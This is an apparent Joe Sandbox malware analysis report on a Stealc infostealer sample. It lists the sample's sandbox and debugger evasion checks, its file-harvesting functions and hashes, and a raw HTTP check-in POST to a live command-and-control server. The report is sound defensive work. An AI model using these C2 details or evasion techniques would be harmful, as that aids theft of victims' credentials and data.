                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1241A0C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 13ED4B4 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 13ED831 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 13EBF55 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 13FDBFB instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 14734BD instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00FF38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FF4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FEDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00FEDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FEE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00FEE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00FF4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FEED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00FEED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FE16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FEF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FEF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00FF3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FEF68A FindFirstFileA,0_2_00FEF68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FEBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00FEBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FEDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FEDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE1160 GetSystemInfo,ExitProcess,0_2_00FE1160
                Source: file.exe, file.exe, 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2081293607.0000000001831000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2081293607.0000000001862000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2081293607.00000000017EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2081293607.0000000001862000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
                Source: file.exe, 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13698
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13643
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13646
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13663
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13658
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE45C0 VirtualProtect ?,00000004,00000100,000000000_2_00FE45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00FF9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF9750 mov eax, dword ptr fs:[00000030h]0_2_00FF9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00FF78E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5776, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00FF9600
                Source: file.exe, file.exe, 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 4Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00FF7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00FF7980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00FF7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00FF7A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.fe0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2081293607.00000000017EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2039233815.0000000005340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5776, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.fe0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2081293607.00000000017EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2039233815.0000000005340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5776, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.php1file.exe, 00000000.00000002.2081293607.0000000001847000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.phpQfile.exe, 00000000.00000002.2081293607.0000000001847000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37Tzfile.exe, 00000000.00000002.2081293607.00000000017EE000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37file.exe, 00000000.00000002.2081293607.00000000017EE000.00000004.00000020.00020000.00000000.sdmptrue
                      • URL Reputation: malware
                      		unknown
                      http://185.215.113.37/Hfile.exe, 00000000.00000002.2081293607.0000000001847000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37/e2b1563c6670f193.phpefile.exe, 00000000.00000002.2081293607.0000000001847000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown
                          http://185.215.113.37/e2b1563c6670f193.phpcfile.exe, 00000000.00000002.2081293607.0000000001862000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown
                            http://185.215.113.37/t1file.exe, 00000000.00000002.2081293607.00000000017EE000.00000004.00000020.00020000.00000000.sdmptrue
                              		unknown
                              http://185.215.113.37/e2b1563c6670f193.phpyfile.exe, 00000000.00000002.2081293607.0000000001847000.00000004.00000020.00020000.00000000.sdmptrue
                                		unknown
                                http://185.215.113.37/e2b1563c6670f193.php8file.exe, 00000000.00000002.2081293607.0000000001847000.00000004.00000020.00020000.00000000.sdmptrue
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  185.215.113.37
                                  		unknownPortugal
                                  		206894WHOLESALECONNECTIONSNLtrue

                                  General Information

                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1523618
                                  Start date and time:2024-10-01 20:54:06 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 2m 45s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:2
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:file.exe
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@1/0@0/1
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 80%
                                  • Number of executed functions: 18
                                  • Number of non-executed functions: 83
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Stop behavior analysis, all processes terminated

                                  Warnings

                                  • Exclude process from analysis (whitelisted): dllhost.exe
                                  • VT rate limit hit for: file.exe

                                  Simulations

                                  Behavior and APIs

                                  No simulations

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.37/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.37/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.37/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.37/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.37/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37/e2b1563c6670f193.php

                                  Domains

                                  No context

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.37
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.37
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.37
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.37
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.37
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  No created / dropped files found

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.950960970175894
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:file.exe
                                  File size:1'844'736 bytes
                                  MD5:ed976a68fbf288f214e53f8ee4734fcc
                                  SHA1:a67a4f8e2e21d8d8721a7eafdb2a13655854e4f1
                                  SHA256:538f1b2469163b43d505e8d7f15b9618fc25834aa3b2ebe3f452b120120250cd
                                  SHA512:163b230505d67ff3f5dae64321591ae143819387475274377e30f6bfdc710d18ebbac3eb14ccc9108c23c662d858769d9eff01f8274fab3af6d44ecc93b2677c
                                  SSDEEP:49152:EMoTEGtgeGzFVokLvwzDdYdvopaLjDX48Yaop2Cy:joTHgeGzFSkzwzDdAom62/
                                  TLSH:FC8533C9C7202CC8C45E1E3BE569590E6564B734F8D874921D678EBC484FA2DB6E9CF0
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                                  File Icon

                                  Icon Hash:00928e8e8686b000

                                  Static PE Info

                                  General

                                  Entrypoint:0xa9b000
                                  Entrypoint Section:.taggant
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                                  Entrypoint Preview

                                  Instruction
                                  jmp 00007F11F9317DCAh

                                  Rich Headers

                                  Programming Language:
                                  • [C++] VS2010 build 30319
                                  • [ASM] VS2010 build 30319
                                  • [ C ] VS2010 build 30319
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
                                  • [LNK] VS2010 build 30319

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  0x10000x25b0000x228005cf8322a8a25b2dcd52c3b2feddeb69dunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  0x25e0000x29f0000x2001f4f840d2f10cea201eb49a7caf1ce3dunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  sixuqxru0x4fd0000x19d0000x19c400f1ddb7ae9329205e05e7c2ab4fdfb76bFalse0.9947944303365677data7.952856690004543IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  exgbaerq0x69a0000x10000x400c05cf4c7333f161801bc819912a398e8False0.759765625data6.06382716181185IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .taggant0x69b0000x30000x22006a40804166d5865836279961652e6b50False0.3492647058823529DOS executable (COM)3.857738272247669IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                  Imports

                                  DLLImport
                                  kernel32.dlllstrcpy

                                  Network Behavior

                                  Suricata IDS Alerts

                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                  2024-10-01T20:54:59.674785+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549704185.215.113.3780TCP

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Oct 1, 2024 20:54:58.704547882 CEST4970480192.168.2.5185.215.113.37
                                  Oct 1, 2024 20:54:58.709459066 CEST8049704185.215.113.37192.168.2.5
                                  Oct 1, 2024 20:54:58.709665060 CEST4970480192.168.2.5185.215.113.37
                                  Oct 1, 2024 20:54:58.709834099 CEST4970480192.168.2.5185.215.113.37
                                  Oct 1, 2024 20:54:58.714849949 CEST8049704185.215.113.37192.168.2.5
                                  Oct 1, 2024 20:54:59.411379099 CEST8049704185.215.113.37192.168.2.5
                                  Oct 1, 2024 20:54:59.411474943 CEST4970480192.168.2.5185.215.113.37
                                  Oct 1, 2024 20:54:59.444483042 CEST4970480192.168.2.5185.215.113.37
                                  Oct 1, 2024 20:54:59.449975967 CEST8049704185.215.113.37192.168.2.5
                                  Oct 1, 2024 20:54:59.674668074 CEST8049704185.215.113.37192.168.2.5
                                  Oct 1, 2024 20:54:59.674784899 CEST4970480192.168.2.5185.215.113.37
                                  Oct 1, 2024 20:55:02.522011042 CEST4970480192.168.2.5185.215.113.37

                                  HTTP Request Dependency Graph

                                  • 185.215.113.37

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.549704185.215.113.37805776C:\Users\user\Desktop\file.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 1, 2024 20:54:58.709834099 CEST89OUTGET / HTTP/1.1
                                  Host: 185.215.113.37
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Oct 1, 2024 20:54:59.411379099 CEST203INHTTP/1.1 200 OK
                                  Date: Tue, 01 Oct 2024 18:54:59 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 0
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Oct 1, 2024 20:54:59.444483042 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----DBGHJEBKJEGHJKECAAKJ
                                  Host: 185.215.113.37
                                  Content-Length: 211
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Data Raw: 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 42 36 34 32 46 41 44 42 45 31 45 32 36 34 33 30 39 35 39 34 32 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 2d 2d 0d 0a
